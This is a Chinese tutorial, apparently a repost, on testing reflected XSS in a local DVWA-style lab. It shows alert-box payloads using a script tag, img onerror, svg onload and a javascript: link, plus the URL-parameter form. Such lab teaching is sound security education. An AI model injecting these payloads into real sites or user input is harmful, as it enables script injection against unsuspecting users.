当前位置: 首页 > ds >正文

XSS (Reflected)-反射型XSS

📍 路径

访问:

http://localhost:8080/vulnerabilities/xss_r/

你会看到一个简单的表单,只有一个输入框,提示类似:

What’s your name?

🧪 Step 1:输入测试 Payload

在输入框里输入:

<script>alert('XSS')</script>

然后点击 Submit。

✅ 预期效果:
页面会刷新,同时浏览器会弹出一个提示框,显示内容为 XSS。
在这里插入图片描述

在这里插入图片描述

🔁 Step 2:确认漏洞是“反射型”

反射型 XSS 的特征是——你注入的脚本被立即反射回页面,例如你访问:

http://localhost:8080/vulnerabilities/xss_r/?name=<script>alert('XSS')</script>

你会发现你的输入直接出现在页面上,说明页面未做过滤/编码处理。
在这里插入图片描述

💡 Step 3:尝试其他 Payload

有些浏览器或安全等级会拦截

图片 onerror:

<img src=x onerror=alert('XSS')>

在这里插入图片描述

SVG onload:

<svg/onload=alert('XSS')>

在这里插入图片描述

JS URL 方案(有时配合链接):

<a href="javascript:alert('XSS')">Click me</a>

在这里插入图片描述

http://www.xdnf.cn/news/14226.html

相关文章:

  • 晶振常见封装工艺及其特点
  • 深入讲解 Ollama 的源码
  • 【Java多线程从青铜到王者】定时器的原理和实现(十一)
  • Spring依赖注入源码学习:基于XML配置的DI源码解析
  • PGCP:用于比较基因组学的植物基因组综合数据库-文献精读144
  • 信息学奥赛一本通 1543:【例 3】与众不同
  • ubuntu之坑(十四)——安装FFmpeg进行本地视频推流(在海思平台上运行)
  • UVM同步的方法
  • RPT:预训练新范式,用强化学习做预训练!
  • 生成式AI如何与RPA融合?
  • Cursor-1.0安装Jupyter-Notebook,可视化运行.ipynb文件中Python分片代码
  • 使用麒麟V10操作系统的KVM服务,但麒麟V10存在高危漏洞无法修复?
  • 【运维】iDRAC、Lifecycle Controller、Unified Server Configurator 的区别
  • 【1/2, 2/3, 3/5, 5/8, 8/13, ...写一个函数,计算以下数列的前10项之和,在主函数中调用该函数并输出结果。】2022-5-19
  • 成都鼎讯短波通信信号模拟设备:短波频段的电磁模拟王者​
  • 【iSAQB软件架构】良好的设计技术
  • spring:使用注解@Configuration、@ComponentScan创建配置类(未完待续)
  • mysql8数据库本地能连上但是远程连不上
  • AI作画提示词:Prompts工程技巧与最佳实践
  • GEO指南之内容创业者:AI时代的“品牌大模型种草”与IP推荐力打造
  • OSPF基础实验案例
  • Java登录验证后台实现详解
  • 【QSoundEffect QT 音频文件的播放】
  • 岛屿周长问题的三种解法:直接计数法、数学计算法与深度优先搜索
  • 精益数据分析(100/126):SaaS行业付费注册率优化与商业模式选择策略
  • Vue3本地存储实现方案
  • java通过hutool工具生成二维码实现扫码跳转功能
  • 【C/C++ 为什么 unique_ptr 不支持拷贝构造、赋值构造等操作】
  • SpringBoot项目接入DeepSeek指南:从零开始实现AI能力整合
  • PyTorch优化器总结